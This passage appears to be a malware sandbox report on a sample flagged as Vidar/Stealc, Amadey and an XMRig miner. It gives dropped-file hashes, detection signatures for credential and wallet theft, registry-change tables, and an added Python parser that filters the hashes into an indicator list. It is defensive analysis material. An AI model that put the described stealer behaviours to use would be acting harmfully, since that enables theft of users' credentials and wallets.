| SHA256 | f61565f679439fa725b50389ef83a4e84370d1f6668f1c0bf4534f5732bd0550 |
| SHA512 | a06f13dd53078886501ef9b26176f8ad12cb13cebd9616e727adcd377a693649a7f69b2d418a25fe3bce935e03f83ed5522d3ad1f161df480dddd046973c48d9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\prefs-1.js
| MD5 | 91c1da42219a2fb2e7f9103ea13dc88b |
| SHA1 | 122eb67b7123df1b6649d526d3e86158f72a4f32 |
| SHA256 | 44ec520567c08938c12d5de18c1931428a3d96fa5f406d7f6dff30f00b1b294d |
| SHA512 | 01e1805b0884346aca62adfddad48d5284c8a8c5b900ffedd14e27534482b95b74b4b71c22da11f67758c8401bdb52dd43f660db3dffa1db570cd9a4940b14e9 |
C:\Users\Admin\AppData\Local\Temp\2b3a32ff
| MD5 | 3e3b6508df3bd06454d63864a53b1eb6 |
| SHA1 | 6a2ff007b89468ae4e2dfcd2786876fd3447c98a |
| SHA256 | 096a37de7aeacdc8bde78c9b75f7bef3c64263eaec2c93c4e0f602c009e77f60 |
| SHA512 | bee95f3b2dbb6407b0f3a5df40d83c1a1aa6821d29efa75f33958821b5ff66882a3c57d1d332b365d75198ed21aff0339d1cf4359a0d6e7d4f1e46cecc32910e |
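The dropped-file list above mixes three kinds of entry: artifacts worth pivoting on (the NSS library softokn3.dll and a VC runtime dropped into C:\ProgramData\KECBFBAEBKJJ, which is consistent with the report's Vidar/Stealc verdict, since those stealers fetch exactly those libraries to decrypt Firefox credential stores; the .job files under C:\Windows\Tasks), entries whose digests are those of zero bytes (C:\Windows\de-DE is a directory, not a payload), and files Firefox and the shell rewrite on their own during any detonation. The following parser is an added example, not part of this report or of the sandbox's tooling: it reads the page's path-plus-hash-row layout, validates digest lengths, recomputes the empty-input digests instead of trusting them, and filters the noise before emitting an IOC list. The sample text is a constructed excerpt using paths and digests copied from this page, and NOISE_MARKERS is an assumed baseline for this sandbox image.

```python
import hashlib
import re
from dataclasses import dataclass, field

# Constructed excerpt in the report's own layout (a path line followed by
# "| ALGO | hex |" rows); the paths and digests are copied from this page.
SAMPLE = r"""
C:\ProgramData\KECBFBAEBKJJ\softokn3.dll
| MD5 | 4e52d739c324db8225bd9ab2695f262f |
| SHA1 | 71c3da43dc5a0d2a1941e874a6d015a071783889 |
| SHA256 | 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a |
memory/2252-466-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Windows\de-DE
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n9vxbo99.default-release\cache2\doomed\4216
| MD5 | 73bb550fe5f21caaae36b265271d8665 |
| SHA256 | e039514b9e5674ef01da8c0bcd77bb89ddc38baed6b593fe7ca6488008d3c9de |
C:\Windows\Tasks\Watcher Com SH.job
| MD5 | e91d0c1fa8f6675eba5c6b3fea3d43db |
| SHA256 | fdc967b5c567e5c9ab9d703c6eaefbab274cb6e45ab8549067250eb01d1df24b |
"""

ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Digests of zero bytes, computed rather than hard-coded: a "dropped file"
# carrying these is a directory or an empty placeholder, not a payload.
EMPTY_DIGEST = {
    "MD5": hashlib.md5(b"").hexdigest(),
    "SHA1": hashlib.sha1(b"").hexdigest(),
    "SHA256": hashlib.sha256(b"").hexdigest(),
    "SHA512": hashlib.sha512(b"").hexdigest(),
}

# Assumed noise for this sandbox image: files the browser and shell rewrite
# on their own during detonation, which say nothing about the sample.
NOISE_MARKERS = (
    "\\mozilla\\firefox\\profiles\\",
    "\\recent\\customdestinations\\",
    "\\clr_v4.0\\usagelogs\\",
)


@dataclass
class Artifact:
    path: str
    hashes: dict = field(default_factory=dict)


def parse_dropped_files(text):
    """Turn the report's path + hash-row layout into Artifact records."""
    artifacts, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW.match(line)
        if m:
            if current is None:
                raise ValueError(f"hash row before any path: {line}")
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != DIGEST_LEN[algo]:
                raise ValueError(f"{current.path}: {algo} has {len(digest)} hex chars")
            current.hashes[algo] = digest
        elif line.startswith("|"):
            raise ValueError(f"unrecognised table row: {line}")
        else:
            current = Artifact(path=line)
            artifacts.append(current)
    return artifacts


def classify(a):
    """Label an artifact so only hashes worth pivoting on reach the IOC list."""
    if a.path.startswith("memory/"):
        return "memory-dump"  # sandbox region dump; the page lists no file digest
    if not a.hashes:
        return "no-hash"
    if any(a.hashes[algo] == EMPTY_DIGEST[algo] for algo in a.hashes):
        return "empty"
    if any(marker in a.path.lower() for marker in NOISE_MARKERS):
        return "browser-noise"
    return "candidate"


def triage(text):
    return {a.path: classify(a) for a in parse_dropped_files(text)}


def candidate_sha256s(text):
    """Sorted SHA256 list of artifacts that survive the noise filters."""
    return sorted(
        a.hashes["SHA256"]
        for a in parse_dropped_files(text)
        if classify(a) == "candidate" and "SHA256" in a.hashes
    )
```

Run `candidate_sha256s(SAMPLE)` and only the softokn3.dll and the .job file remain; the empty-digest check catches entries like C:\Windows\de-DE that would otherwise pollute a blocklist with the hash of an empty file, which matches every zero-byte file on every host.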
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-17 18:26
Reported
2024-06-17 18:47
Platform
win10v2004-20240611-en
Max time kernel
1196s
Max time network
1200s
Command Line
Signatures
Amadey
Detect Vidar Stealer
Stealc
Vidar
xmrig
XMRig Miner payload
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
UPX packed file
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Suspicious use of SetThreadContext
Checks installed software on the system
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Watcher Com SH.job | C:\Windows\SysWOW64\ftp.exe | N/A |
| File created | C:\Windows\Tasks\TWI Cloud Host.job | C:\Windows\SysWOW64\ftp.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\AAKEGDAKEH.exe | N/A |
| N/A | N/A | C:\ProgramData\DGDBAKKJKK.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Loads dropped DLL
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /autoplay" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ThreadingModel = "Both" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{917E8742-AA3B-7318-FA12-10485FB322A2}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\Microsoft.SharePoint.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32\ = "%systemroot%\\SysWow64\\shell32.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\Microsoft.SharePoint.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{917E8742-AA3B-7318-FA12-10485FB322A2}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
